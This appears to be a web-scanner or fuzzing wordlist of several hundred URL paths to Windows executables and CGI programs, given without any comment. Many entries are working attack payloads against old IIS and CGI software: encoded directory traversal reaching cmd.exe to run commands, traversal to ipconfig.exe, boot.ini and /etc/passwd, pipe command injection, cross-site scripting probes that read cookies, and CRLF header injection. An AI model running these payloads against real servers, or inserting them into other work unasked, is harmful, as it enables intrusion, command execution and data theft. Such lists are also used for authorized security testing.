/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
5.exe
acls.exe
/adm-bin/acls.exe
adm-bin/acls.exe
/adm-bin/alerts.exe
adm-bin/alerts.exe
/adm-bin/console.exe
adm-bin/console.exe
/adm-bin/listdb.exe
adm-bin/listdb.exe
/adm-bin/webstats.exe
adm-bin/webstats.exe
admcgi/scripts/Fpadmcgi.exe
/admin.exe
admin.exe
alerts.exe
/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
/author.exe
author.exe
avisynth_257.exe
Avisynth_257.exe
bin/cfgwiz.exe
bin/CGImail.exe
bin/fpremadm.exe
bin/fpsrvadm.exe
/bin/HealthMonitoringService.exe
/bin/SchedulerService.exe
/c32web.exe/ChangeAdminPassword
c32web.exe/ChangeAdminPassword
/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf 
candle.exe.config
/cart32.exe
cart32.exe
Cassini.exe.config
certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
/cfgwiz.exe
cfgwiz.exe
/cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/CFIDE/installers/CFReportBuilderInstaller.exe
cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/c32web.exe/ChangeAdminPassword
cgi-bin/cart32.exe
cgi-bin/cfgwiz.exe
cgi-bin/cgimail.exe
cgi-bin/CGImail.exe
cgi-bin/cgi-test.exe
cgi-bin/cgitest.exe
cgi-bin/Cgitest.exe
cgi-bin/cmd1.exe?/c+dir
cgi-bin/cmd.exe?/c+dir
cgi-bin/dbmlparser.exe
cgi-bin/foxweb.exe
cgi-bin/fpremadm.exe
cgi-bin/fpsrvadm.exe
cgi-bin/get32.exe
cgi-bin/GW5/GWWEB.EXE
cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
cgi-bin/GWWEB.EXE?HELP=bad-request
/cgi-bin/gx.exe
cgi-bin/gx.exe
cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
cgi-bin/htimage.exe
/cgi-bin/htimage.exe?2,2
cgi-bin/htimage.exe/path/filename?2,2
cgi-bin/imagemap.exe
/cgi-bin/imagemap.exe?2,2
cgi-bin/ion-p.exe?page=c
cgi-bin/mailform.exe
cgi-bin/minimal.exe
cgi-bin/mkilog.exe
cgi-bin/mkplog.exe
cgi-bin/MsmMask.exe
cgi-bin/MsmMask.exe?mask=/junk334
cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/Pbcgi.exe
cgi-bin/perl.exe
cgi-bin/perl.exe?-v
cgi-bin/post16.exe
cgi-bin/post32.exe|dir%20c
cgi-bin/ppdscgi.exe
cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
cgi-bin/rguest.exe
cgi-bin/sensepost.exe?/c+dir
cgi-bin/StAdminAct.exe
cgi-bin/testcgi.exe
cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
cgi-bin/texis.exe/junk
cgi-bin/visadmin.exe
cgi-bin/visitor.exe
cgi-bin/VsSetCookie.exe?
cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
cgi-bin/webbbs.exe
cgi-bin/webfind.exe?keywords=01234567890123456789
cgi-bin/Webnews.exe
cgi-bin/webplus.exe?about
cgi-bin/wguest.exe
cgi-bin/windmail.exe
cgi-bin/WINDMAIL.EXE?%20-n%20c
cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
/cgimail.exe
cgimail.exe
cgi-shl/win-c-sample.exe
/cgitest.exe
cgitest.exe
/Cgitest.exe
Cgitest.exe
cgi-win/cgitest.exe
cgi-win/uploader.exe
/cmd1.exe?/c+dir
cmd1.exe?/c+dir
/cmd.exe?/c+dir
cmd.exe?/c+dir
comagentinstall.exe
ComAgentInstall.exe
console.exe
cstartup.exe
c/winnt/system32/cmd.exe?/c+dir+/OG
/dbmlparser.exe
dbmlparser.exe
dev60cgi/ifcgi60.exe
dostcafem.exe
~.exe
.exe
.exe,
.EXE
.exec
f60cgi.exe
/fcgi-bin/echo2.exe
fcgi-bin/echo2.exe
fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
/fcgi-bin/echo.exe
fcgi-bin/echo.exe
fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
/foxweb.exe
foxweb.exe
fpcount.exe
/fpsrvadm.exe
fpsrvadm.exe
FxCopCmd.exe.config
Gallio.Ambience.Server.exe.config
Gallio.Echo.exe.config
Gallio.Host.exe.config
Gallio.Host.x86.exe.config
Gallio.Icarus.exe.config
Gallio.Navigator.exe.config
/get32.exe
get32.exe
getid3.exe.php
/GW5/GWWEB.EXE
GW5/GWWEB.EXE
/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
/GW5/GWWEB.EXE?HELP=bad-request
GW5/GWWEB.EXE?HELP=bad-request
/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?HELP=bad-request
/gx.exe
gx.exe
/HFM/Downloads/j2re-1_3_1_04-windows-i586-i.exe
HFM/Downloads/j2re-1_3_1_04-windows-i586-i.exe
/HFM//HFMOfficeProviderSetup/setup.exe
HFM/HFMOfficeProviderSetup/setup.exe
/hpnst.exe?c=p+i=
hpnst.exe?c=p+i=SrvSystemInfo.html
/htimage.exe
htimage.exe
/htimage.exe/path/filename?2,2
htimage.exe/path/filename?2,2
hypage.exe
iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
iissamples/exair/howitworks/Winmsdp.exe
iissamples/issamples/Winmsdp.exe
iissamples/sdk/asp/docs/Winmsdp.exe
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
/imagemap.exe
imagemap.exe
/ion-p.exe?page=c
ion-p.exe?page=c
ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>
light.exe.config
listdb.exe
lpls158.exe
/mailform.exe
mailform.exe
MbUnit.Cons.exe.config
MbUnit.GUI.exe.config
/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/minimal.exe
minimal.exe
/mkilog.exe
mkilog.exe
/mkplog.exe
mkplog.exe
module.misc.exe.php
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c
msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/msdac/root.exe?/c+dir
/MsmMask.exe
MsmMask.exe
/MsmMask.exe?mask=/junk334
MsmMask.exe?mask=/junk334
nakido.exe
NAnt.exe.config
NCover.Console.exe.config
NCoverExplorer.exe.config
NCoverExplorer.NCoverRunner.Execution.NCoverCoverageType.html
NCoverExplorer.NCoverRunner.Execution.NCoverLogLevel.html
NDepend.Console.exe.config
nginx.exe
NHQG.exe.config
ntbbs.exe
/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
nunit-agent.exe.config
nunit-console.exe.config
nunit-console-x86.exe.config
nunit.exe.config
nunit-gui.exe.config
nunit-x86.exe.config
officescan/cgi/cgiChkMasterPwd.exe
officescan/cgi/jdkRqNotify.exe
ows-bin/oaskill.exe?abcde.exe
ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
/Pbcgi.exe
Pbcgi.exe
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/perl.exe
perl.exe
/perl.exe?-v
perl.exe?-v
php/php.exe?c
/post16.exe
post16.exe
/post32.exe|dir%20c
post32.exe|dir%20c
/ppdscgi.exe
ppdscgi.exe
/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
/rguest.exe
rguest.exe
rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
runFile.exe.config
/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c
scripts/cfgwiz.exe
/scripts/cgimail.exe
scripts/CGImail.exe
/scripts/counter.exe
scripts/counter.exe
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
scripts/fpadmcgi.exe
/scripts/fpcount.exe
scripts/fpcount.exe
scripts/fpremadm.exe
scripts/fpsrvadm.exe
/scripts/root.exe?/c+dir
scripts/root.exe?/c+dir+c
/scripts/samples/search/webhits.exe
scripts/samples/search/webhits.exe
scripts/tools/dsnform.exe
scripts/tools/getdrvrs.exe
/scripts/tools/getdrvs.exe
/scripts/tools/newdsn.exe
scripts/tools/newdsn.exe
scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
/sensepost.exe?/c+dir
sensepost.exe?/c+dir
setup.exe
setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
/shtml.exe
shtml.exe
simpleprep.exe
/siteminderagent/pwcgi/smpwservicescgi.exe
SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
smg_Smxcfg30.exe?vcc=3560121183d3
softcart.exe
SoftCart.exe
stadminact.exe
StateNameServer.exe.config
Tarantino.Daemon.Console.exe.config
Tarantino.Daemon.exe.config
Tarantino.DatabaseManager.exe.config
Tarantino.Deployer.Console.exe.config
Tarantino.Deployer.exe.config
/testcgi.exe
testcgi.exe
/test-cgi.exe?<script>alert(document.cookie)</script>
/testcgi.exe?<script>alert(document.cookie)</script>
test-cgi.exe?<script>alert(document.cookie)</script>
testcgi.exe?<script>alert(document.cookie)</script>
texis.exe/?-dump
/texis.exe/junk
texis.exe/junk
texis.exe/?-version
/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA
tvcs/getservers.exe?action=selects1
uploader.exe
us/cgi-bin/sewse.exe?d
/visadmin.exe
visadmin.exe
/visitor.exe
visitor.exe
VsSetCookie.exe?
_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_bin/cfgwiz.exe
_vti_bin/CGImail.exe
_vti_bin/fpcount.exe
_vti_bin/fpcount.exe/
/_vti_bin/fpcount.exe?Page=default.asp|Image=3
_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
_vti_bin/fpremadm.exe
_vti_bin/fpsrvadm.exe
_vti_bin/shtml.exe
_vti_bin/shtml.exe/junk_nonexistant.exe
/_vti_bin/shtml.exe/qwertyuiop
_vti_bin/shtml.exe/_vti_rpc
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
/_vti_pvt/shtml.exe
wa.exe
/webbbs.exe
webbbs.exe
/webfind.exe?keywords=01234567890123456789
webfind.exe?keywords=01234567890123456789
/Webnews.exe
Webnews.exe
/webplus.exe?about
webplus.exe?about
webstats.exe
/wguest.exe
wguest.exe
/windmail.exe
windmail.exe
/WINDMAIL.EXE?%20-n%20c
WINDMAIL.EXE?%20-n%20c
/../../../../../../../../../../WINNT/system32/ipconfig.exe
xunit.console.exe.config
